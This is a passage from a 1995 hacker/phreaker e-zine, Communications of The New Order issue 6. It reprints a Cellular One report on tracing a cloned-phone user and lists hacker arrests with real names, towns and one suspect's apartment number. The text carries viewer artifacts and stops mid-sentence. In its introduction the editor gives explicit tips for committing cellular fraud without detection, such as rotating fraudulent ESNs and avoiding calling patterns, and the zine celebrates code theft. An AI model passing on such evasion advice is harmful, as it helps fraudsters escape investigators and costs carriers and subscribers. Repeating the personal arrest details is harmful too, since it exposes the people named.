3578 lines
167 KiB
Plaintext
3578 lines
167 KiB
Plaintext
|
______ ______ _____________ ____ ___ ______
|
|||
|
/ ____|\ / \ /____ ____/\ / | \ / / | / \
|
|||
|
/ / ____\| / __ |\ \_/ /\____\/ / | / / / / __ |\
|
|||
|
/ / / / /__/ / | / / / / /| |/ / / / /__/ / |
|
|||
|
/ /__/______ | / / / / / / / | / / | / /
|
|||
|
|____________|\ |\_____ / / /__ / / /___/ / |___/ / |\_____ / /
|
|||
|
|_____________\| \|____| / \__\ / |___ |/ |___|/ \|____| /
|
|||
|
|
|||
|
____
|
|||
|
/ \ ---
|
|||
|
/ \ \ __
|
|||
|
/ /\ \ \ \
|
|||
|
_/______|_/ / / / \
|
|||
|
| | / / / /
|
|||
|
| ---\( |/ / / /
|
|||
|
| \|\(/ \(/\(/
|
|||
|
| |
|
|||
|
/ /
|
|||
|
/ \ /
|
|||
|
/ \ ___/
|
|||
|
/
|
|||
|
/
|
|||
|
/
|
|||
|
|
|||
|
Communications of The New Order
|
|||
|
Issue #6
|
|||
|
Fall 1995
|
|||
|
|
|||
|
|
|||
|
"There is nothing more difficult to take in and, more perilous
|
|||
|
to conduct, or more uncertain in its success, than to take the
|
|||
|
lead in a new order of things."
|
|||
|
|
|||
|
- Niccolo Machiavelli'
|
|||
|
|
|||
|
|
|||
|
Cavalier........"I hacked codes to get warez for free drugs."
|
|||
|
Dead Kat........"I have non-hacker friends but fuck if I keep in
|
|||
|
contact with them, they don't have k0d3z."
|
|||
|
Disorder........"US West knew we were getting their stuff, they
|
|||
|
just didn't know we were on the deferred payment
|
|||
|
plan."
|
|||
|
Edison.........."I said fuck you cop.. well I wish I had said that."
|
|||
|
Major..........."SUNOS... the swiss cheese of unix."
|
|||
|
Voyager........."I don't think money is as powerful as fear, but
|
|||
|
I have a day job."
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Special Thanks: Gatsby, Mark Tabas, The Doktor, Presence,
|
|||
|
Demonika, Rage (303), Invalid Media, Deathstar, KevinTX,
|
|||
|
Intrepid Traveler, Plexor, yLe, Drunkfux, Damien Thorne,
|
|||
|
Brownstone, Storm Bringer, Neophyte, Ole Buzzard, AntiChrist,
|
|||
|
Redboxchilipepper, El Jefe, Jupiter, Captain Hemp.
|
|||
|
|
|||
|
Good Luck: Mark Tabas, Gatsby, Kevin Crow, Dispater, St. Elmo,
|
|||
|
Zibby, Dr. Delam, Phantom Phreaker, Purple Condom, Manson,
|
|||
|
BernieS, Kevin Mitnick, Alphabits.
|
|||
|
|
|||
|
|
|||
|
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
__/\iNTRo/\__
|
|||
|
|
|||
|
|
|||
|
CoTNo is a 'zine of the computer underground of the 1990's. It is written
|
|||
|
for H4Qu3r's and pHR3aCK3r's of intermediate to beginning experience. All
|
|||
|
the information published herein is as accurate as possible and pertains to
|
|||
|
techniques and devices that actually work. We do not publish any article
|
|||
|
that is not of an H/P nature. If you wish to comment on or contribute to
|
|||
|
CoTNo, email one of us, or catch one of us on the iRC or try to catch
|
|||
|
us in your local Telco dumpster.
|
|||
|
|
|||
|
Ahem...
|
|||
|
|
|||
|
This issue is dedicated to all of our good friends who have recently been
|
|||
|
busted. In fact, the last three issues are dedicated to them, since there
|
|||
|
have been more people busted in the last twelve months then at any time since
|
|||
|
Sundevil. In issue four I espoused my opinion that there was a federal
|
|||
|
conspiracy at work with paid informants masquerading as our friends. Last
|
|||
|
issue I gave detailed information on one of our own busted members, John
|
|||
|
Falcon. In this issue there will be information you can use to help keep
|
|||
|
yourself out of jail.
|
|||
|
|
|||
|
In this issue, Disorder has compiled detailed information on the busts of
|
|||
|
lasts twelve months. Each bust that we heard of is detailed with names and
|
|||
|
events. Hindsight is always clearer than foresight, so hopefully you can
|
|||
|
learn from these busts how to avoid a similar fate. Also in this issue, I
|
|||
|
am releasing confidential information on how cellular fraud is prevented.
|
|||
|
The information is straight from a national cellular carrier and details
|
|||
|
exactly how the telcos detect, trace, and bust cellular abuse. This
|
|||
|
information should convince you to take the utmost precautions if you are
|
|||
|
experimenting with cellular technology. Lastly, John Falcon sent me an
|
|||
|
article on what to do if you do get busted. I think this is the first H/P
|
|||
|
article ever written from jail!
|
|||
|
|
|||
|
The following information was an actual article from Cellular One that was
|
|||
|
distributed to some of their employees. This article was not edited in
|
|||
|
anyway, and contains the best information I have ever seen on how cellular
|
|||
|
fraud is prevented. If you are participating in cellular phreaking, I
|
|||
|
recommend that you read this article very closely and take it as a warning
|
|||
|
from the Cellular Telephone industry. They are getting serious about halting
|
|||
|
cellular fraud, and for good reason. In New York for instance, often
|
|||
|
there are more fraudulent cellular calls than legitimate ones on any given
|
|||
|
day! The Fedz are on their side too. As you may already know, the Fedz ran
|
|||
|
an underground BBS for 8 months this year just to catch Cellular Fraudsters.
|
|||
|
In fact, Kevin Mitnick was recently busted using the same methods described
|
|||
|
in the following article.
|
|||
|
|
|||
|
The article, dated February 1995, follows:
|
|||
|
|
|||
|
A team of five Cellular One employees helped stop cellular fraud in Denver
|
|||
|
last week. To protect both our employees and future investigations,
|
|||
|
Cellular One team members names will not be released.
|
|||
|
|
|||
|
California officials tracked a suspect from the Los Angeles area using a
|
|||
|
cloned cellular phone to Denver early last week and asked Cellular One for
|
|||
|
assistance in locating this suspect. With the cloned cellular phone number
|
|||
|
and a number the suspect repeatedly called in California, the five Cellular
|
|||
|
One employees and both local and California law enforcement agents began
|
|||
|
tracking the whereabouts of the suspect through the pattern of his cellular
|
|||
|
phone calls.
|
|||
|
|
|||
|
Using AMA searches, RFCALL Trace, directional antennas, an IFR 1500, an
|
|||
|
RSAT Plus, and hours of labor, the Cellular One team identified the suspect's
|
|||
|
calling patterns. An AMA search is a record of an individual cellular
|
|||
|
phone number's calls. The cellular number is input along with the
|
|||
|
parameters for the search - start and finish date and time - and a log is
|
|||
|
printed which shows each individual call made by that cellular number.
|
|||
|
This tool is used generally within three days of the calls which you wish
|
|||
|
to observe. AMA searches were compiled over several days to document the
|
|||
|
calling patterns of the suspect.
|
|||
|
|
|||
|
While the AMA searches show the past calling pattern, when attempting to
|
|||
|
capture a cellular fraud suspect, real time tools must also be used. The
|
|||
|
Cellular One team used RFCALL Trace which tracks similar information as an
|
|||
|
AMA record with the exception that the information can be collected with
|
|||
|
only a 10 second delay from real time. RFCALL Trace also tracks the
|
|||
|
individual radio in use, any handoffs, and the signal strength of
|
|||
|
the cellular call. Law enforcement agents issued a subpoena to Cellular One
|
|||
|
for all information regarding the fraudulent cellular phone number's
|
|||
|
activity on our system.
|
|||
|
|
|||
|
Most of the fraudulent phone calls were being placed between 10am and
|
|||
|
midnight. Tracking which cell sites, cell faces, and radios the suspect's
|
|||
|
calls set up on identified a small geographical area as the suspect's base of
|
|||
|
action. Once an area had been established, one team member drove this area
|
|||
|
using an RSAT Plus, an IFR 1500, and a directional antenna (all basic
|
|||
|
cellular test equipment used in system optimization) to pinpoint the suspect's
|
|||
|
location to a specific apartment complex. This team me tracked the calls
|
|||
|
made by the suspects's cellular number and, watching the faces serving the
|
|||
|
calls and he handoffs made by the system during the suspect's calls, he was
|
|||
|
able to narrow down the location from which the calls were made to a specific
|
|||
|
side of one apartment building.
|
|||
|
|
|||
|
The law enforcement agents, equipped with their own brand of cellular fraud-
|
|||
|
busting tools, asked if the Cellular One team could identify the actual
|
|||
|
apartment within the building where the calls were being placed. A narrowband
|
|||
|
directional antenna was set to the transmit frequency of the cloned phone.
|
|||
|
One problem was that with each new phone call, the frequency being tracked
|
|||
|
changed. The suspect made short calls, most around one minute, with the
|
|||
|
longest between three to five minutes. Using the directional antenna
|
|||
|
and resetting the frequency with each new call on the cloned phone, the
|
|||
|
Cellular One employee identified a group of apartments within the building
|
|||
|
from which the cellular calls were being placed.
|
|||
|
|
|||
|
Unfortunately, the suspect slipped out of the building before the specific
|
|||
|
apartment was identified. Again using RFCALL Trace, the Cellular One team
|
|||
|
logged the suspect's next phone call on a cell site near Stapleton
|
|||
|
Airport. Law enforcement was notified and kept aware of the phone calls as
|
|||
|
the suspect traveled throughout the system. It became evident that the
|
|||
|
suspect was moving back toward the apartment complex. Surveillance
|
|||
|
officers outside the apartment noticed three men enter just moments before
|
|||
|
the Cellular One team notified them that a call had been placed from the
|
|||
|
apartment. Within 20 minutes, the suspects again left the apartment.
|
|||
|
Denver Police began pursuit of the suspect and made the arrest. Five
|
|||
|
additional cellular phones were found in the suspect's apartment. It has
|
|||
|
not been determined if these phones are cloned.
|
|||
|
|
|||
|
Although cellular fraud exists, it is possible to catch the criminals.
|
|||
|
Congratulations to our fraud busters! Cellular One asks that you keep this
|
|||
|
story confidential since the specifics of this and future investigations
|
|||
|
depend on our ability to catch the criminals in action.
|
|||
|
|
|||
|
End of Cellular One Article.
|
|||
|
|
|||
|
Pretty scary, huh? Cellular phreaking used to be considered pretty safe, but
|
|||
|
times have changed. The cellular phone companies are losing so much money on
|
|||
|
cellular fraud, that they have made busting the cellular hackers a priority.
|
|||
|
If you do commit cellular fraud, I suggest you use the following guidelines:
|
|||
|
|
|||
|
1. Never use the fraudulent ESN for over two weeks.
|
|||
|
2. Change ESN's as often as possible.
|
|||
|
3. Avoid creating a calling pattern with your fraudulent ESN.
|
|||
|
4. Avoid using the fraudulent ESN from a stationary location.
|
|||
|
|
|||
|
These tips could keep you out of jail! Because you cannot divert with a
|
|||
|
cellular phone (unless you are Kevin Mitnick) these precautions are necessary.
|
|||
|
As my friend John Falcon told me, "Its not worth doing time for silly phone
|
|||
|
shit." He's right. H/P is fun, but anyone who has gotten busted will tell
|
|||
|
you the same.
|
|||
|
|
|||
|
But if despite these warnings, you still decide to cellular phreak, just make
|
|||
|
this quote from Gatsby your mantra, "An ESN a day, keeps the federals away."
|
|||
|
|
|||
|
|>ead|<at
|
|||
|
-=(TNo)=-
|
|||
|
|
|||
|
|
|||
|
Table of Contents
|
|||
|
~~~~~~~~~~~~~~~~~
|
|||
|
Introduction......................................Dead Kat
|
|||
|
Operation Phundevil...............................Disorder
|
|||
|
What Happens When You Get Caught..................John Falcon
|
|||
|
Legal and Technical Aspects of RF Monitoring......Major
|
|||
|
The Tao of 1AESS..................................Dead Kat & Disorder
|
|||
|
Frequently Visited AT&T Locations.................Major & Dead Kat
|
|||
|
Remote Hacking in Unix............................Voyager
|
|||
|
The Definity Audix VMS Inside Out.................Boba Fett
|
|||
|
Bridging the Gap..................................Eddie Van Halen
|
|||
|
Elite Music Part V................................Disk Jockey
|
|||
|
Conclusion........................................Dead Kat
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
-= Operation Phundevil =-
|
|||
|
|
|||
|
by DisordeR[TNo]
|
|||
|
|
|||
|
|
|||
|
With all the busts happening in the past year, and a lack of
|
|||
|
information in the scene regarding who got busted when, and for what,
|
|||
|
I decided to put this article together. After working on this for a
|
|||
|
while, I realized that not only was it a little difficult in finding
|
|||
|
bust info, but half of the little you found was bullshit.
|
|||
|
|
|||
|
The information in the following article is as accurate as I
|
|||
|
can find. With all the different accounts of what happened, different
|
|||
|
nicknames, different NPA's, and pure stupidity out there, don't bet your
|
|||
|
life on the information contained within this article.
|
|||
|
|
|||
|
The following sections give you some details about some busts,
|
|||
|
and RUMORS of others. I indicate which are rumors and which are legit.
|
|||
|
I utilized everything from BBS posts, to newspaper articles, to word
|
|||
|
of mouth. Thanks to those who helped me on this. And by no means is this
|
|||
|
NEAR complete...
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"OPERATION CYBERSNARE: FEDZ = 1, PHREAKZ = 0"
|
|||
|
|
|||
|
Main Thugs:
|
|||
|
Peter A. Cavicchia II - Special Agent in Charge
|
|||
|
Donna Krappa - Assistant U.S. Attorney in Newark
|
|||
|
Stacey Bauerschmidt - "Carder One"
|
|||
|
|
|||
|
The Busted:
|
|||
|
Richard Lacap - "Chillin" - Katy, Texas: Accused of conspiring to break
|
|||
|
into the Portland, Oregon AT&T Wireless computers.
|
|||
|
Kevin Watkins - "Led" - Houston, Texas: Accused of conspiring to break
|
|||
|
into the Portland, Oregon AT&T Wireless computers.
|
|||
|
Watkins used the computer system of Embry Riddle University in
|
|||
|
Prescott, Ariz., to enter the McCaw computer, Secret Service
|
|||
|
Special Agent Stacey Bauerschmidt said in a sworn statement.
|
|||
|
Jeremy Cushing - "Alpha Bits" - Huntington Beach, California: Accused
|
|||
|
of trafficking in cloned cellular phones/equipment and stolen
|
|||
|
access devices (ESN/MIN Pairs).
|
|||
|
Frank Natoli - "Mmind" - Brooklyn, New York: Accused of trafficking in
|
|||
|
stolen access devices.
|
|||
|
Al Bradford - "Cellfone" - Detroit, Michigan: Accused of trafficking in
|
|||
|
unauthorized access devices.
|
|||
|
Michael Clarkson - "Barcode" - Brooklyn, New York: Accused of possessing
|
|||
|
and trafficking in hardware used to obtain unauthorized access to
|
|||
|
telecommunications services.
|
|||
|
|
|||
|
Penalty:
|
|||
|
If convicted, defendants face maximum possible sentences ranging
|
|||
|
from 15 years for Cushing to 10 years for Bradford, Clarkson and
|
|||
|
Natoli and five years for Lacap and Watkins.
|
|||
|
|
|||
|
Details:
|
|||
|
Starting in January, Stacey Bauerschmidt and other Secret Service
|
|||
|
agents in Newark, NJ, set up what is now called "an electronic chop shop"
|
|||
|
by the press. Stacey (in cooperation with a 'nameless informer' who will
|
|||
|
be mentioned later) set up a computer BBS called "Celco 51" with the
|
|||
|
intent of busting hackers and phreakers specializing in cellular phone
|
|||
|
fraud.
|
|||
|
For the first sixth months, the board operated using MBBS with
|
|||
|
four nodes. At any given time the board had an 800 re-route (not really)
|
|||
|
so that the users could call without any problem (ANI). To the credit of
|
|||
|
the agents in charge, the board did not allow just anyone access. The sysop
|
|||
|
(PMF) appeared to discriminate and only allow the 'elite' members of the
|
|||
|
H/P community on. With the illusion of security, the agents running the
|
|||
|
board could successfully monitor the users, and begin to make deals with
|
|||
|
the hackers.
|
|||
|
Stacey [Who went by 'Carder One'] continually asked members of the
|
|||
|
BBS if they were interested in selling ESN/MIN pairs [Used for cellular
|
|||
|
phone fraud]. These 'pairs' are considered 'illegal access devices' and
|
|||
|
are usually found in large enough amounts to consist of felonies. On top
|
|||
|
of the illegal access devices, Stacey was looking for people that were
|
|||
|
willing to sell illegal cloning equipment. This equipment consisted of
|
|||
|
devices used to get pairs, clone phones, and reprogram phones.
|
|||
|
The operation was very successful in many ways, notably the ability
|
|||
|
of the agents to mask the true nature of the board. For over eight months,
|
|||
|
Stacey and other agents monitored the board looking for any chance to
|
|||
|
prosecute any of the members. The sysop (PMF) continuously advertised the
|
|||
|
board to the members, as well as mailed and HARASSED members into calling
|
|||
|
more than they wished to (Entrapment anyone?). PMF was responsible for
|
|||
|
mailing members up to three times a day, message flooding people on IRC,
|
|||
|
and using other methods of harassment to get hackers to call.
|
|||
|
On top of the harassment, Carder One continuously asked for people
|
|||
|
to post 'pairs' as well as sell them in private. In a few cases, individuals
|
|||
|
would not have considered selling these pairs had the federal agents not
|
|||
|
harassed them so much. Ahem.
|
|||
|
|
|||
|
"Cushing and five others were arrested in four states during a
|
|||
|
sweep last week by federal agents. Another 14 raids spread over eight
|
|||
|
states led to the confiscation of 31 computers, 65 illegally programmed
|
|||
|
phones and 14 "readers," devices used to illegally pluck cellular phone
|
|||
|
numbers and serial codes from cellular phone transmissions."
|
|||
|
[Wonder who's computer will run the next sting board?]
|
|||
|
|
|||
|
"But because the alleged crooks posted phone numbers on the bulletin
|
|||
|
board indicating where they could be reached, the Secret Service was able to
|
|||
|
trace the calls, leading to the arrests."
|
|||
|
[Need we emphasize the importance of Diverting any more?]
|
|||
|
|
|||
|
"But officials said this case represented the first time that the
|
|||
|
Secret Service had created an entirely new computer bulletin board..."
|
|||
|
[Couldn't bust any warez kiddies recently...]
|
|||
|
|
|||
|
[Watch out kiddies... They are using more than 'questionable' methods
|
|||
|
of busting hackers and phreaks these days. If you haven't met someone,
|
|||
|
be careful of what you post on their systems.. many people thought
|
|||
|
PMF was cool until he NARKED on everyone that he could.]
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"ANARCHIST BUSTED FOR WRITING MAGAZINE"
|
|||
|
|
|||
|
From: The Anarchives <tao@presence.lglobal.com>
|
|||
|
|
|||
|
In early march of 1995 I was arrested for "Unauthorized Use Of A Computer".
|
|||
|
|
|||
|
Three large, white, plain-clothes detectives from 52 division in downtown
|
|||
|
toronto came to my house, promptly arrested me, took me to a holding
|
|||
|
cell, and conducted a strip search (looking for codes I guess). I was
|
|||
|
held in custody for four hours (7:30 pm to 11:30 pm), and released as a
|
|||
|
result of substantial protest made by friends and family at the sergeants
|
|||
|
desk.
|
|||
|
|
|||
|
I was being accused of breaking into the computer systems at the
|
|||
|
University Of Toronto for the purpose of publishing "Anarchist
|
|||
|
newsletters".
|
|||
|
|
|||
|
The sysadmin of ecf.utoronto.ca, one Professor Jack Gorrie
|
|||
|
<gorrie@ecf.utoronto.ca>, saw someone on his system publishing Anarchist
|
|||
|
materials, assumed I was a malicious "hacker", turned over all records of
|
|||
|
my email, news posts, key strokes, you name it, to the police at 52
|
|||
|
division. The police realizing how dangerous these "hacker anarchist"
|
|||
|
types are, had to come to my house to cuff me, bring me down, and strip
|
|||
|
search me.
|
|||
|
|
|||
|
I was to face trial for a possible six months in prison, just for
|
|||
|
exercising my democratic rights and responsibilities.
|
|||
|
|
|||
|
Of course the end result was that the charges were dropped, although this
|
|||
|
was not until several months later (sept 7, 95), after several
|
|||
|
appearances in court, and after my agreeing to pay $400 to the skule.
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"FEDS SAY HACKERS CRACKED INTO TOWER CREDIT CARD RECORDS"
|
|||
|
by, Denny Walsh
|
|||
|
|
|||
|
From: The Sacramento Bee
|
|||
|
Saturday Sept. 16, 1995
|
|||
|
|
|||
|
Two talented Berkeley hackers were charged Friday with computer-
|
|||
|
age crimes against a Tower Video rental store in Sacramento, federal
|
|||
|
authorities said, in large part because they went up against Tower's even
|
|||
|
more talented electronic security corps.
|
|||
|
|
|||
|
When authorities raided their apartment last month, Terry Patrick Ewing,
|
|||
|
21, and Michael Yu Kim, 20, had the credit card numbers of 2,000 Tower
|
|||
|
customers, federal prosecutors said.
|
|||
|
|
|||
|
According to a federal grand jury indictment, Ewing and Kim used
|
|||
|
their personal computer to break into a system know as TRON, owned and
|
|||
|
operated by Tower's West Sacramento-based parent, MTS Inc.
|
|||
|
|
|||
|
Kim and Ewing are charged in a three-count indictment with
|
|||
|
conspiracy, fraud and the unauthorized destruction of computer data.
|
|||
|
|
|||
|
The prosecutor said the pair are not in custody and will be
|
|||
|
allowed to surrender next week. He said he does not see them as flight
|
|||
|
risks.
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"KEVIN MITNICK BUST - HIGHLIGHTS"
|
|||
|
|
|||
|
From Multiple Sources
|
|||
|
|
|||
|
If you want more details, read the hundreds of articles about this story.
|
|||
|
Also, read the Phrack 47 editorial pertaining to this subject.
|
|||
|
|
|||
|
Kevin Mitnick (31)
|
|||
|
-One of the first indicted under Computer Security Act of 1987
|
|||
|
-Search began in November 1992
|
|||
|
-Mark Seiden (expert in firewalls) discovered that someone had obtained
|
|||
|
all of Netcom's credit card numbers for 20,000 online subscribers.
|
|||
|
-Stole files from: Motorola, Apple, Netcom, and more.
|
|||
|
-Mitnick used the Well as a repository for files he stole from computer
|
|||
|
security expert Tsutoma Shimomura.
|
|||
|
-After raping Tsutoma, he used Bruce Koball's account to transfer
|
|||
|
proprietary software from Motorola, NEC, Nokia, Novatel, Oki, Qualcomm,
|
|||
|
and other cell manufacturers.
|
|||
|
-Shimomura concluded that it was Mitnick, and that he was operating
|
|||
|
through cellular, from Raleigh, NC
|
|||
|
-Mitnick was bouncing his calls through GTE Switches, local switches,
|
|||
|
and a few types of cellular switches, and utilized Netcom's dialins.
|
|||
|
-Lived in Player's Court, a 12-unit apartment building in suburb of
|
|||
|
Duraliegh Hills, three miles from the airport. He lived in Apt 202.
|
|||
|
-Until a week or two before he was arrested, FBI surveillance agents in
|
|||
|
Los Angeles were certain that 'the intruder' was somewhere in Colorado.
|
|||
|
-FBI arrested him at 24 hour stakeout
|
|||
|
-Arrested in Raleigh, N.C. at 1:30 a.m.
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"PHREAKS BUSTED IN NY... MORE TO COME"
|
|||
|
|
|||
|
"Ok all Listen up and listen good. resistance is down. Maybe permanently. Most
|
|||
|
of you prolly haven't heard yet, but there have been major busts going around.
|
|||
|
... Today alone i found out that Neon Samurai, Tokien Entry, and Hellfire
|
|||
|
have been busted. ... that they even busted craig neidorf(knight lightnig)
|
|||
|
again.
|
|||
|
|
|||
|
More bad news. If you are on UPT(unphamiliar territory) or Cellco 51, stop
|
|||
|
calling. The SS who raided hellfire slipped a bit and bragged about being on
|
|||
|
those boards.
|
|||
|
|
|||
|
Hellfire said the feds were mostly interested in credit cards,
|
|||
|
VMB's, and Cell phones.
|
|||
|
|
|||
|
They are looking to bust for cellular, VMB's and credit cards...
|
|||
|
|
|||
|
Tokien entry i found out has been in jail for 2 days!
|
|||
|
Neon Samurai was busted for credit cards and also for telco equipment that
|
|||
|
the nynex people said was worth 50,000. "
|
|||
|
|
|||
|
|
|||
|
PMFs (Narc) reply:
|
|||
|
|
|||
|
"dude, this is utter shit and i expect u to post this reply for me seeing
|
|||
|
as i ain't on that bbs.. Hellfire gave up his accounts to UPT and my bbs
|
|||
|
among others, he was the only person busted and nothing to do with his
|
|||
|
busts was EVER mentioned on my board. He doesn't even get involved in
|
|||
|
cellphones, he was busted coz he and every other person busted used
|
|||
|
1 800 CALL ATT from his house.. what a bunch of lamers... I don't even
|
|||
|
know who wrote that next but i would like to find out.. probably the guys
|
|||
|
from NYHE..."
|
|||
|
[Ironic isn't it!]
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"ALPHABITS ORIGINAL BUST LAST YEAR"
|
|||
|
|
|||
|
Caught alphabits on irc lastnight and he said:
|
|||
|
|
|||
|
<alphabits> but I got sent to prison 7 months ago, and lost contact ***
|
|||
|
|
|||
|
According to different people, he was busted for check fraud and/or credit
|
|||
|
fraud and/or cellular fraud. Unfortunately, I will not be able to talk
|
|||
|
to him until after this article.
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"SYNCOMM, MEMBER OF S.O.B (SERVANTS OF BABUSHKA) RAIDED"
|
|||
|
|
|||
|
From another group member:
|
|||
|
|
|||
|
Syncomm was talking on the phone.. the day before Master of Reality got
|
|||
|
busted... so MOR, Greg and equinox were sitting there chatting away when
|
|||
|
a load of federal agents <SS, FBI, 1 NSA guy and even a guy from customs>
|
|||
|
and some local police busted down his door. He dropped the phone and all
|
|||
|
they heard was a rustle of papers .. then a "Secure that paper!" then a
|
|||
|
click.. They put a shotgun to his head and said "Hello Syncomm". They
|
|||
|
said he was the leader of S.O.B. an international terrorist organization.
|
|||
|
Then again they thought that Crypt Keeper and MOR were also the sole
|
|||
|
leader of SOB ... So then they put a knee to his back and handcuffed him
|
|||
|
<Greg, 16, apparently posed a serious threat>. They proceeded to
|
|||
|
interrogate.. and at one point this one agent <female> tried to seduce him
|
|||
|
into talking <I think he would of he she did more .. ;)> ..
|
|||
|
|
|||
|
He was finaly was lead outside when his neighbor walked up to them and
|
|||
|
handed them all of Greg's notes, etc.. that greg had asked him to stash..
|
|||
|
Greg then threatened his neighbors life.. <which he came back to do
|
|||
|
unhandcuffed afterwards> and was led off to holding... were they produced
|
|||
|
"A big fucking printout" that apparently detailed Greg's activities.. they
|
|||
|
nailed him for hacking UC and then accused him of crashing their
|
|||
|
systems.. Along with criminal tools <his computer> and some other
|
|||
|
offenses.. <one of which I am sure of is Wire Fraud.. they love that>
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"FBI REVEALS ARREST IN MAJOR CD-ROM PIRACY CASE"
|
|||
|
|
|||
|
SOFTWARE CRACKDOWN - Two Canadians were arrested in a blitz
|
|||
|
that has software companies upset to see piracy extending
|
|||
|
into the CD-ROM format.
|
|||
|
|
|||
|
From the Associated Press, Saturday Dec 24 1994
|
|||
|
|
|||
|
BUFFALO, New York - The FBI has arrested a Canadian father and son in what
|
|||
|
is believed to be the first major case of CD-ROM piracy in the United States.
|
|||
|
|
|||
|
Agents said Thursday they seized 15,000 counterfeit copies of the popular
|
|||
|
CD Rom games REBEL ASSAULT and MYST that were being sold at 25% of retail
|
|||
|
value.
|
|||
|
|
|||
|
PETER MISKO, 63, of Mississauga, Ontario, and his son, BRUCE MISKO, 36, of
|
|||
|
CHICAGO were arrested in Buffalo and charged with felony copyright infringe-
|
|||
|
ment. The counterfeit goods were recovered in a Niagara Country warehouse
|
|||
|
authorities said.
|
|||
|
|
|||
|
The FBI told the Los Angeles Times that additional warrants were served in
|
|||
|
INDIANA and NEW HAMPSHIRE as part of a crackdown on retail stores selling
|
|||
|
the illegal software. MORE ARRESTS ARE EXPECTED.
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"MULTI-COUNTRY EFFORT CRACKS COMPUTER RING"
|
|||
|
|
|||
|
TORONTO - Canadian, US and European investigators
|
|||
|
have cracked a ring of computer hackers who allegedly
|
|||
|
stole about $5 million US$ by breaking into the
|
|||
|
computers of phone companies and other firms.
|
|||
|
|
|||
|
The 12 hackers who met over the Internet, used coding
|
|||
|
and call switching to conceal the transfer of funds,
|
|||
|
codes and communications.
|
|||
|
|
|||
|
RUDY LOMBARDI, 22, of MISSISSAUGA Ontario PLEADED
|
|||
|
GUILTY on Tuesday, June 27 1995. He got 90 days in
|
|||
|
Jail and 100 hours of community services for HELPING
|
|||
|
the RCMP with their investigation - instead of at least
|
|||
|
a one year jail sentence.
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"RUMORS FROM 914"
|
|||
|
|
|||
|
There has been a huge chain of busts in 914. Apparently, GANGSTER,
|
|||
|
who ran a board in 914 called 'Bamboozie Dimension' was busted. Rumor
|
|||
|
goes on to say that he was 'fucking around with CC's' which led to the
|
|||
|
bust.
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"WAREZ BUSTS IN 510"
|
|||
|
|
|||
|
The Sewer Line BBS in 510 met trouble on December 11th due to the
|
|||
|
distribution of console warez (from various posts). Rumor also has it,
|
|||
|
that a user on the board going by ROCK'N was in fact a sega representative,
|
|||
|
and narked on the sysop for his activities.
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"214 BUSTS"
|
|||
|
|
|||
|
During August of '94, several boards (mostly warez/ansi affiliated)
|
|||
|
were raided by the FBI. The busts occurred in the Dallas/Ft. Worth
|
|||
|
area, the list follows:
|
|||
|
Agents of Fortune [409] (Sysop: Butcher [LEGEND])
|
|||
|
Suburbia [214] (Sysop: The Chairman [RZR],
|
|||
|
The Network [214] (Sysop: Masterblaster)
|
|||
|
The Depths [214] (Sysop: Maelstrom ex-[RZR/iCE])
|
|||
|
Elm Street [214] (Sysop: Freddy Krueger)
|
|||
|
User to User [214] (Sysop: William Pendergast)
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"PHILLY 2600 MEETING"
|
|||
|
|
|||
|
From recent posts and word of mouth, the Philadelphia 2600 meetings are
|
|||
|
having a hard time making it past 5 minutes. Apparently, local police in
|
|||
|
coordination with mall rent-a-cops [joining of forces there], are kicking
|
|||
|
hackers and phreakers out of their meeting place based on charges of
|
|||
|
loitering and conspiracy [to do what?! Assemble?]. Currently, police
|
|||
|
are threatening to break up meetings, and/or jail participants for the
|
|||
|
two reasons cited above.
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"FEDZ BUST KID IN MINNESOTA"
|
|||
|
|
|||
|
November '94, a 15 year old in Minnesota had a pleasant visit by
|
|||
|
federal agents. According to newspaper articles, the boy [unnamed
|
|||
|
in the article] was basing his hacks out of the Detroit Free-Net.
|
|||
|
"He used passwords to gain access to more than 10 computer networks
|
|||
|
from Detroit to Moscow". During his time on the Detroit Free-Net,
|
|||
|
he was said to have maliciously disabled enough of the system 'forcing'
|
|||
|
it to shut down.
|
|||
|
Currently, the boy is facing potential charges for using
|
|||
|
telecommunications devices to cross state lines, and felony charges
|
|||
|
for breaking into computer systems.
|
|||
|
|
|||
|
Other favorite quotes from the articles about this case:
|
|||
|
"...hospitalized, possibly for psychological reasons, when police
|
|||
|
confiscated his computer modem and software programs Monday."
|
|||
|
|
|||
|
"...said the boy appeared to fit the typical hacker profile: a
|
|||
|
15- to 20-year-old male, many who have low self-esteem. 'He really
|
|||
|
could use a girlfriend instead of a computer' Grewe said."
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"THE TROUBLES OF BERNIE S."
|
|||
|
|
|||
|
Recently, a lot of press has been covering the story of 'Bernie S'.
|
|||
|
You can find more info about his bust on alt.2600 as well as several
|
|||
|
'hacker' mailing lists. Here are some of the interesting quotes from
|
|||
|
one of those articles:
|
|||
|
|
|||
|
"Ed Cummings, also known to many in cyberspace as Bernie SS was arrested
|
|||
|
on March 13th, 1995 for 2 misdemeanors of possession, manufacture and sale
|
|||
|
of a device to commit Telecommunications fraud charges. He is being held in
|
|||
|
Delaware County Prison in lieu of $100,000.00 Bail."
|
|||
|
His arrest took place at a local 7-11 where *15* police cars pulled
|
|||
|
into the parking lot. During the interaction with the officer, he told
|
|||
|
